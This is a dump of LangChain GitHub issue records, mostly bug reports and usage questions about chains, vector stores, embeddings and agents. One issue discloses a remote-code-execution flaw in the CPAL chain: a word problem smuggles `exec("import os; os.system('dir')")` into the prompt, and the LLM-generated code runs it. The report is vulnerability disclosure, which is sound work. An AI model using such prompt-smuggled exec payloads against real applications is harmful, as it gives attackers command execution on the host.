issue_owner_repo
listlengths 2
2
| issue_body
stringlengths 0
261k
⌀ | issue_title
stringlengths 1
925
| issue_comments_url
stringlengths 56
81
| issue_comments_count
int64 0
2.5k
| issue_created_at
stringlengths 20
20
| issue_updated_at
stringlengths 20
20
| issue_html_url
stringlengths 37
62
| issue_github_id
int64 387k
2.46B
| issue_number
int64 1
127k
|
---|---|---|---|---|---|---|---|---|---|
[
"hwchase17",
"langchain"
]
| I am using router chaining to route my input. For the destination chains, I have four LLMChains and one ConversationalRetrievalChain.
And to combine this I am using MultiPromptChain. But it isn't working.
Below are the functions to generate router chains and destination chains.
Any suggestions?
```
def generate_destination_chains():
"""
Creates a list of LLM chains with different prompt templates.
"""
prompt_factory = PromptFactory()
destination_chains = {}
for p_info in prompt_factory.prompt_infos:
name = p_info['name']
prompt_template = p_info['prompt_template']
if name == 'insurance sales expert':
# Declaration of chain one
chain = ConversationalRetrievalChain.from_llm(llm=llm,
retriever=vectorstore.as_retriever(search_kwargs={"k": 6}),
# memory=memory,
chain_type="stuff",
return_source_documents=True,
verbose=False,
# return_generated_question=True,
# get_chat_history=lambda h :h,
# max_tokens_limit=4000
# combine_docs_chain_kwargs={"prompt": prompt_template}
)
else:
chain = LLMChain(llm=llm,
prompt=PromptTemplate(template=prompt_template,#, memory=memory,
input_variables=['input']))
destination_chains[name] = chain
default_chain = ConversationChain(llm=llm, output_key="text")
return prompt_factory.prompt_infos, destination_chains, default_chain
def generate_router_chain(prompt_infos, destination_chains, default_chain):
"""
Generates the router chains from the prompt infos.
:param prompt_infos The prompt informations generated above.
:param destination_chains The LLM chains with different prompt templates
:param default_chain A default chain
"""
destinations = [f"{p['name']}: {p['description']}" for p in prompt_infos]
destinations_str = '\n'.join(destinations)
router_template = MULTI_PROMPT_ROUTER_TEMPLATE.format(destinations=destinations_str)
router_prompt = PromptTemplate(
template=router_template,
input_variables=['input'],
output_parser=RouterOutputParser()
)
router_chain = LLMRouterChain.from_llm(llm, router_prompt)
return MultiPromptChain(
router_chain=router_chain,
destination_chains=destination_chains,
default_chain=default_chain,
verbose=True,
# callbacks=[file_ballback_handler]
)
```
### Suggestion:
_No response_ | Can't use ConversationalRetrievalChain with router chaining | https://api.github.com/repos/langchain-ai/langchain/issues/7644/comments | 4 | 2023-07-13T08:54:29Z | 2023-10-21T16:07:00Z | https://github.com/langchain-ai/langchain/issues/7644 | 1,802,530,745 | 7,644 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
how to use contextual compression in a ConversationalRetrievalChain
### Suggestion:
_No response_ | how to use contextual compression in a ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7642/comments | 1 | 2023-07-13T07:44:03Z | 2023-07-13T07:50:51Z | https://github.com/langchain-ai/langchain/issues/7642 | 1,802,406,179 | 7,642 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain 0.0.231, Windows 10, Python 3.10.11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run the following code:
from langchain.experimental.cpal.base import CPALChain
from langchain import OpenAI
llm = OpenAI(temperature=0, max_tokens=512)
cpal_chain = CPALChain.from_univariate_prompt(llm=llm, verbose=True)
question = (
"Jan has three times the number of pets as Marcia. "
"Marcia has print(exec(\\\\\\\"import os; os.system('dir')\\\\\\\")) more pets than Cindy. "
"If Cindy has 4 pets, how many total pets do the three have?"
)
cpal_chain.run(question)
### Expected behavior
Expected to have some kind of validation to mitigate the possibility of unbound Python execution, command execution, etc. | RCE vulnerability in CPAL (causal program-aided language) chain | https://api.github.com/repos/langchain-ai/langchain/issues/7641/comments | 1 | 2023-07-13T07:26:31Z | 2023-08-29T18:44:50Z | https://github.com/langchain-ai/langchain/issues/7641 | 1,802,378,837 | 7,641 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am using LLMChainFilter and ContextualCompressionRetriever to compress my context, like this
`llm=AzureChatOpenAI(deployment_name="gpt-35-turbo", model_name='gpt-35-turbo', temperature=0
, max_tokens=500)
compressor = LLMChainFilter.from_llm(llm)
compression_retriever =ContextualCompressionRetriever(base_compressor=compressor,base_retriever=chroma.as_retriever(search_kwargs=search_kwargs))`
and I saw if LLMChainFilter return empty docs, the ContextualCompressionRetriever return empty too, can ContextualCompressionRetriever return base_retriever if LLMChainFilter return empty docs?
### Suggestion:
_No response_ | can LLMChainFilter support default retriever | https://api.github.com/repos/langchain-ai/langchain/issues/7640/comments | 1 | 2023-07-13T07:06:22Z | 2023-10-19T16:05:40Z | https://github.com/langchain-ai/langchain/issues/7640 | 1,802,349,041 | 7,640 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain 0.0.231 on mac, python 3.11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Follow the basic example* in the Chroma docs, that goes something like:
```
client = chromadb.Client(Settings(...))
db = Chroma(client=client, collection_name="my_collection")
```
However, this throws an error:
```
File "/Users/dondo/Library/Caches/pypoetry/virtualenvs/app-IE1VmXUs-py3.11/lib/python3.11/site-packages/langchain/vectorstores/chroma.py", line 105, in __init__
self._client_settings.persist_directory or persist_directory
^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'Chroma' object has no attribute '_client_settings'
```
Looking at the line in question\*\*, this seems like a bug: when you pass in `client`, `self._client_settings` is not set, but is referenced.
\* example: <https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/chroma.html#basic-example-using-the-docker-container>
\*\* code: <https://github.com/hwchase17/langchain/blob/5171c3bccaf8642135a20e558eb8468ccbfcc682/langchain/vectorstores/chroma.py#L105>
### Expected behavior
According to the docs, creating a Chroma instance from a chromadb client should be supported. | Chroma db w/client: AttributeError: 'Chroma' object has no attribute '_client_settings' | https://api.github.com/repos/langchain-ai/langchain/issues/7638/comments | 2 | 2023-07-13T06:06:50Z | 2023-07-13T13:28:58Z | https://github.com/langchain-ai/langchain/issues/7638 | 1,802,251,081 | 7,638 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.230
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
class SemanticSearch():
"""Class containing modules for the semantic search.
"""
model_name: str
model: HuggingFaceEmbeddings
def __init__(self,
model_name: str = "sentence-transformers/distiluse-base-multilingual-cased-v2",
**kwargs
) -> None:
self.model_name = model_name
self.model = HuggingFaceEmbeddings(model_name=self.model_name, **kwargs)
def vectorize_doc(self, doc: Path, vectordb_dir: Path) -> None:
"""Transform a doc containing all the information into a VectorDB.
Args:
doc (Path): File path containing the information. doc is a .txt file with /n/n/n separator.
vectordb_path (Path, optional): _description_. Defaults to config.VECTORDB_PATH.
"""
if os.path.exists(doc):
with open(doc, "r") as f:
text = f.read()
texts = text.split("\n\n\n")
LOGGER.info(f'Number of chunks: {len(texts)}')
Chroma.from_texts(texts=texts,
embedding=self.model,
persist_directory=str(vectordb_dir) # Need to be a string
)
LOGGER.info(f"VectorDB correctly created at {vectordb_dir}")
else:
raise FileNotFoundError(f"{doc} does not exist.")
def search(self, query: str, vectordb_dir:str = config.get('config', 'VECTORDB_PATH'), k: int = 1) -> List[Tuple[Document, float]]:
"""From a query, find the elements corresponding based on personal information stored in vectordb.
Euclidian distance is used to find the closest vectors.
Args:
query (str): Question asked by the user.
vectordb_dir (str, optional): Path to the vectordb. Defaults to config.VECTORDB_DIR.
Returns:
List[Tuple[Document, float]]: Elements corresponding to the query based on semantic search, associated
with their respective score.
"""
timestamp = time.time()
vectordb = Chroma(persist_directory=vectordb_dir, embedding_function=self.model)
results = vectordb.similarity_search_with_score(query=query, k=k)
LOGGER.info(f"It took {time.time() - timestamp} to search elements with semantic search.")
return results
```
### Expected behavior
no error | chromadb.errors.InvalidDimensionException: Dimensionality of (512) does not match index dimensionality (768) | https://api.github.com/repos/langchain-ai/langchain/issues/7634/comments | 4 | 2023-07-13T03:47:13Z | 2024-03-13T19:57:14Z | https://github.com/langchain-ai/langchain/issues/7634 | 1,802,101,252 | 7,634 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain 0.0.231 on mac, python 3.11
### Who can help?
@jeffchub
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
tl;dr: chroma no longer supports `{}` metadata which breaks `.addtexts()`: https://github.com/chroma-core/chroma/issues/791#issuecomment-1630909852
I have written this code to try using a Chroma db for memory in a ConversationChain (based on this example: <https://python.langchain.com/docs/modules/memory/how_to/vectorstore_retriever_memory>):
```python
db = Chroma(persist_directory=local_dir_path, embedding_function=OpenAIEmbeddings())
retriever = db.as_retriever(search_kwargs=dict(k=1))
memory = VectorStoreRetrieverMemory(retriever=retriever)
llm_chain = ConversationChain(
llm=OpenAIModel(**open_ai_params),
prompt=prompt,
memory=memory,
verbose=True,
)
chain = SimpleSequentialChain(chains=[moderation_chain, llm_chain]
chain.run(input="hello")
```
However, I get an error `ValueError: Expected metadata to be a non-empty dict, got {}`
I see `langchain/vectorstores/base.py` in the stack trace, and add logging:
```python
def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]:
"""Run more documents through the embeddings and add to the vectorstore.
Args:
documents (List[Document]: Documents to add to the vectorstore.
Returns:
List[str]: List of IDs of the added texts.
"""
# TODO: Handle the case where the user doesn't provide ids on the Collection
texts = [doc.page_content for doc in documents]
metadatas = [doc.metadata for doc in documents]
print(f"texts: {texts}")
print(f"metadata: {metadatas}")
print(f"kwargs: {kwargs}")
return self.add_texts(texts, metadatas, **kwargs)
```
which logs out
```
texts: ['input: test\nresponse: Hello! How can I assist you today?']
metadata: [{}]
kwargs: {}
```
If I edit the source code to pass `None`, then `self.add_texts` works as expected.
```
metadatas = [doc.metadata for doc in documents]
if all(not metadata for metadata in metadatas): # Check if all items in the list are empty
metadatas = None
```
### Expected behavior
No error should be thrown and `self.add_texts` should work correctly when calling `chain.run(input="hello")`. | Chroma db throws `ValueError: Expected metadata to be a non-empty dict, got {}` as ConversationChain memory | https://api.github.com/repos/langchain-ai/langchain/issues/7633/comments | 10 | 2023-07-13T03:42:31Z | 2023-12-15T10:19:21Z | https://github.com/langchain-ai/langchain/issues/7633 | 1,802,097,263 | 7,633 |
[
"hwchase17",
"langchain"
]
| ### Feature request
import os
from langchain.embeddings import HuggingFaceEmbeddings
EMBEDDING_MODEL = os.getenv("EMBEDDING_MODEL")
model_kwargs = {"device": "cpu"}
encode_kwargs = {"normalize_embeddings": False}
embeddings = HuggingFaceEmbeddings(
model_name=EMBEDDING_MODEL, model_kwargs=model_kwargs, encode_kwargs=encode_kwargs
)
Now I want to get the dimension from embeddings like SentenceTransformer.
from sentence_transformers import SentenceTransformer
device = "cpu"
model = SentenceTransformer(EMBEDDING_MODEL, device=device)
dimension = model.get_sentence_embedding_dimension()
### Motivation
Wrapper method of SentenceTransformer (get_sentence_embedding_dimension())
### Your contribution
no yet | Dimension from embeddings | https://api.github.com/repos/langchain-ai/langchain/issues/7632/comments | 1 | 2023-07-13T03:40:59Z | 2023-10-19T16:05:43Z | https://github.com/langchain-ai/langchain/issues/7632 | 1,802,096,176 | 7,632 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version : 0.0.216
Python version : 3.11.4
System: Windows
### Who can help?
@hwchase17 @eyu
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I want to create a chatbot to retrieve information from my own csv file in response to a query using google PaLM model,
I want to improve the model's capabilities to perform specific data retrieval requests from the CSV. Here are a few examples of queries I would like the chatbot to handle:
a-Calculate the average of data from a specific column in the CSV file.
b-Return the top 10 scores based on a column of grades as a dataframe(the output of llm should be a json format).
c-Track the evolution of a product over time by analyzing a date column.
I have 2 questions :
1-
what should I change in the following code to maintain contextual memory during the conversation(by changing question)?
```
from langchain.agents import create_pandas_dataframe_agent
from langchain.llms import VertexAI
ChatModel = VertexAI(
model_name="text-bison@001",
max_output_tokens=1024,
temperature=0.1,
top_p=0.8,
top_k=40,
verbose=True,
)
pd_agent = create_pandas_dataframe_agent(ChatModel,
df,
verbose=True,
max_iterations=6,)
#prompt=...
#question=...
response = pd_agent.run(prompt + question)
```
2-
I'm looking for efficient ways to handle different types of tasks in my chatbot. Some questions require DataFrame responses, others need text responses, and some require both. Can I create specialized agents to handle specific tasks separately instead of specifying everything in one prompt?
### Expected behavior
1-A chatbot that maintains contextual memory during the conversation using create_pandas_dataframe_agent
2-A suggestion of jobs separation to optimize the output of the chain | How to enable the memory mechanism when using create_pandas_dataframe_agent? | https://api.github.com/repos/langchain-ai/langchain/issues/7625/comments | 3 | 2023-07-12T22:49:20Z | 2023-10-19T16:05:48Z | https://github.com/langchain-ai/langchain/issues/7625 | 1,801,867,603 | 7,625 |
[
"hwchase17",
"langchain"
]
| ### System Info
Hi my data has 10 rows and I tried with both pandas and csv agent, in the observations I can see the agents are able to process all rows, but in the final answer both agents only output the first 5 rows from df.head(). I tried to set 'number_of_head_rows' to 10 but it doesn't work. Is there any way to make the agents to show results from all rows rather the the head?
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.chat_models import AzureChatOpenAI
from langchain.agents import create_pandas_dataframe_agent
from langchain.agents.agent_types import AgentType
pd_agent = create_pandas_dataframe_agent(AzureChatOpenAI(deployment_name="gpt-4", model_kwargs={
"api_key": openai.api_key,
"api_base": openai.api_base,
"api_type": openai.api_type,
"api_version": openai.api_version
}, temperature=0.0),
df,
agent=AgentType.CHAT_ZERO_SHOT_REACT_DESCRIPTION,
verbose=True,
handle_parsing_errors=True)
### Expected behavior
should output the results from whole table | Pandas / CSV agent only show partial results from dataframe head | https://api.github.com/repos/langchain-ai/langchain/issues/7623/comments | 5 | 2023-07-12T22:44:43Z | 2023-10-12T21:14:42Z | https://github.com/langchain-ai/langchain/issues/7623 | 1,801,862,154 | 7,623 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version : 0.0.216
Python version : 3.11.4
System: Windows
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I want to create a chatbot to retrieve information from my own pdf in response to a query using google PaLM model, I followed these steps :
-load the pdf
-split it using RecursiveCharacterTextSplitter
-store its embeddings in a Chroma vectorestore
and then create a chain ...
```
from langchain.document_loaders import PyPDFLoader
from langchain.document_loaders import PyPDFLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.vectorstores import Chroma
from langchain.embeddings.openai import OpenAIEmbeddings
import langchain
loader=PyPDFLoader("path/to/pdf.pdf")
chroma_dir="./chroma
pages=loader.load()
splitter=RecursiveCharacterTextSplitter(
chunk_size=1000,
chunk_overlap=150,
separators=['\n\n','\n'," ",""]
)
splits=splitter.split_documents(pages)
#I want to change this with another embedding method which doesn't require API authentification
embeddings=OpenAIEmbeddings()
vector_db=Chroma.from_documents(
documents=splits,
embedding=embeddings,
persist_directory=chroma_dir
)
```
But the only embedding method that is available in the LangChain documentation is OpenAIEmbeddings,how can we do without it?
### Expected behavior
all the splits embeddings stored in Chroma vectorestore without using OpenAIEmbeddings() | Is it possible to use open source embedding methods rather than OpenAIEmbeddings? | https://api.github.com/repos/langchain-ai/langchain/issues/7619/comments | 2 | 2023-07-12T21:32:46Z | 2024-04-26T12:42:21Z | https://github.com/langchain-ai/langchain/issues/7619 | 1,801,791,302 | 7,619 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am using Windows 11 as OS, RAM = 44GB. Also, I am using LLaMa vicuna-7b-1.1.ggmlv3.q4_0.bin as Local LLM.
I am using Python 3.11.3 in venv virtual environment in VS code IDE and Langchain version 0.0.221.
<img width="948" alt="Screenshot 2023-07-13_Pydantic Error" src="https://github.com/hwchase17/langchain/assets/88419852/6f172fcd-5a06-472f-b3bb-aec069f626f0">
### Who can help?
@hwchase17
@agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Use the following code -
from llama_cpp import Llama
from langchain import PromptTemplate
from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
import os
from dotenv import load_dotenv
import json
import time
load_dotenv()
model_path = os.environ.get('MODEL_PATH')
print(model_path)
# Load the model
print("....Loading LLAMA")
llm = Llama(model_path=model_path, n_ctx=2048, n_threads=8)
# llm = ChatOpenAI(
# temperature=0, model_name="gpt-3.5-turbo"
# )
text="A lion lives in a jungle"
template = """/
Given the text data {text}, I want you to:
extract all possible semantic triples in the format of (subject, predicate,object)"""
triple_template = PromptTemplate(input_variables=["text"], template=template)
#print(triple_template)
#triple_template.format(text=t)
chain = LLMChain(llm=llm, prompt=triple_template)
#Run the model
print("RUnning Model.....")
print(chain.run(text=text))
I have commented out llm generated by ChatOpenAI, this code executes and gives desired results if we use OpenAI LLM. However, I am using LLaMa vicuna-7b-1.1.ggmlv3.q4_0.bin, the chain gives the following error -
File "pydantic\main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for LLMChain
llm
value is not a valid dict (type=type_error.dict)
I have tested the LLaMa LLM, it works outside LLM chain without any problem.
### Expected behavior
In response to the given text, it should have returned a semantic triple of form ( Subject, Predicate Object) ie. ( Lion, Lives in , Jungle) or something similar. | Issue with Langchain LLM Chains | https://api.github.com/repos/langchain-ai/langchain/issues/7618/comments | 4 | 2023-07-12T21:18:33Z | 2023-10-21T16:07:05Z | https://github.com/langchain-ai/langchain/issues/7618 | 1,801,774,854 | 7,618 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain : v0.0.231
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
# Issue
`convert_to_openai_function` does not work as intended:
- Classes are not supported
- Any function without its source is not supported
# Reproduce
```python
from dataclasses import dataclass
from langchain.chains.openai_functions.base import (
convert_to_openai_function,
)
@dataclass
class System:
name: str
ram: int
convert_to_openai_function(System)
```
### Expected behavior
When calling `langchain.chains.openai_functions.base.convert_to_openai_function`, the subsequent call to `_get_python_function_name` fails because it tries to read source code (and cannot find it).
Something much simpler would be to access the `__name__` attribute of the callable.
| _get_python_function_name does not work with classes | https://api.github.com/repos/langchain-ai/langchain/issues/7616/comments | 4 | 2023-07-12T21:03:09Z | 2023-10-19T16:05:58Z | https://github.com/langchain-ai/langchain/issues/7616 | 1,801,757,859 | 7,616 |
[
"hwchase17",
"langchain"
]
| ### System Info
It's unclear how to check your langchain version, I can instead detail the steps I have taken.
I am running python 3.10.6 and python 3.11.4
I have uninstalled and reinstalled both versions individually, in path, and attempted to install and run langchain with just one of either of those two versions installed.
I have installed in both instances 'pip install langchain' uninstalled and reinstalled as 'langchain[all]', ran 'pip install --upgrade langchain[all]'.
I am running this in a streamlit environment with the latest version installed by pip.
the line I am having issue with is:
from langchain.agents import AgentType, initialize_agent, load_tools
Which is out of the langchain published documentation.
### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain import OpenAI
from langchain.agents import AgentType, initialize_agent, load_tools
from langchain import StreamlitCallbackHandler
import streamlit as st
from dotenv import load_dotenv
### Expected behavior
I expect it to import AgentType from langchain.agents as specified in the public documentation. | ImportError: cannot import name 'AgentType' from 'langchain.agents' | https://api.github.com/repos/langchain-ai/langchain/issues/7613/comments | 6 | 2023-07-12T20:17:05Z | 2024-02-15T16:11:10Z | https://github.com/langchain-ai/langchain/issues/7613 | 1,801,689,378 | 7,613 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi, LangChain community,
just to share that even with the examples mentioned in the official documentation, it is almost impossible to get consistent results when using agents with Wikipedia/Google search tools. Or the search is non conclusive or the LLM is totally hallucinating at the very early step of the pipeline. LLMs from OpenAI for Completion or Conversation.
Did someone else notice this new behavior?
Best regards
Jerome
### Suggestion:
_No response_ | Issue: Big issue with inefficient search from Google/Wikipedia and LLM hallucinations with ReAct agent | https://api.github.com/repos/langchain-ai/langchain/issues/7610/comments | 1 | 2023-07-12T20:00:50Z | 2023-10-18T16:05:33Z | https://github.com/langchain-ai/langchain/issues/7610 | 1,801,664,816 | 7,610 |
[
"hwchase17",
"langchain"
]
| ### System Info
Repro:
Running this code sample.
https://github.com/techleadhd/chatgpt-retrieval
```
Traceback (most recent call last):
File "/home/maciej/workdir/intenzia/langchaintest/chatgpt-retrieval/chatgpt.py", line 5, in <module>
from langchain.chains import ConversationalRetrievalChain, RetrievalQA
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/agents/__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/agents/agent.py", line 16, in <module>
from langchain.agents.tools import InvalidTool
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/agents/tools.py", line 8, in <module>
from langchain.tools.base import BaseTool, Tool, tool
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/tools/__init__.py", line 3, in <module>
from langchain.tools.arxiv.tool import ArxivQueryRun
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/tools/arxiv/tool.py", line 12, in <module>
from langchain.utilities.arxiv import ArxivAPIWrapper
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/utilities/__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/utilities/apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/document_loaders/__init__.py", line 44, in <module>
from langchain.document_loaders.embaas import EmbaasBlobLoader, EmbaasLoader
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/document_loaders/embaas.py", line 54, in <module>
class BaseEmbaasLoader(BaseModel):
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/main.py", line 204, in __new__
fields[ann_name] = ModelField.infer(
^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 488, in infer
return cls(
^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 419, in __init__
self.prepare()
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 539, in prepare
self.populate_validators()
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 801, in populate_validators
*(get_validators() if get_validators else list(find_validators(self.type_, self.model_config))),
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/validators.py", line 696, in find_validators
yield make_typeddict_validator(type_, config)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/validators.py", line 585, in make_typeddict_validator
TypedDictModel = create_model_from_typeddict(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/annotated_types.py", line 35, in create_model_from_typeddict
return create_model(typeddict_cls.__name__, **kwargs, **field_definitions)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/main.py", line 972, in create_model
return type(__model_name, __base__, namespace)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/main.py", line 204, in __new__
fields[ann_name] = ModelField.infer(
^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 488, in infer
return cls(
^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 419, in __init__
self.prepare()
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 534, in prepare
self._type_analysis()
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/pydantic/fields.py", line 638, in _type_analysis
elif issubclass(origin, Tuple): # type: ignore
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/typing.py", line 1550, in __subclasscheck__
return issubclass(cls, self.__origin__)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: issubclass() arg 1 must be a class
```
```
langchain==0.0.230
langchainplus-sdk==0.0.20
Python 3.11.0
Ubuntu 22.04
```
```
maciej@ola:~/workdir/intenzia/langchaintest/chatgpt-retrieval$ pip freeze
aiohttp==3.8.4
aiosignal==1.3.1
anyio==3.7.1
async-timeout==4.0.2
attrs==23.1.0
backoff==2.2.1
certifi==2023.5.7
cffi==1.15.1
chardet==5.1.0
charset-normalizer==3.2.0
chromadb==0.3.27
click==8.1.4
clickhouse-connect==0.6.6
coloredlogs==15.0.1
cryptography==41.0.2
dataclasses-json==0.5.9
duckdb==0.8.1
et-xmlfile==1.1.0
fastapi==0.85.1
filetype==1.2.0
flatbuffers==23.5.26
frozenlist==1.3.3
greenlet==2.0.2
h11==0.14.0
hnswlib==0.7.0
httptools==0.6.0
humanfriendly==10.0
idna==3.4
importlib-metadata==6.8.0
joblib==1.3.1
langchain==0.0.230
langchainplus-sdk==0.0.20
lxml==4.9.3
lz4==4.3.2
Markdown==3.4.3
marshmallow==3.19.0
marshmallow-enum==1.5.1
monotonic==1.6
mpmath==1.3.0
msg-parser==1.2.0
multidict==6.0.4
mypy-extensions==1.0.0
nltk==3.8.1
numexpr==2.8.4
numpy==1.25.1
olefile==0.46
onnxruntime==1.15.1
openai==0.27.8
openapi-schema-pydantic==1.2.4
openpyxl==3.1.2
overrides==7.3.1
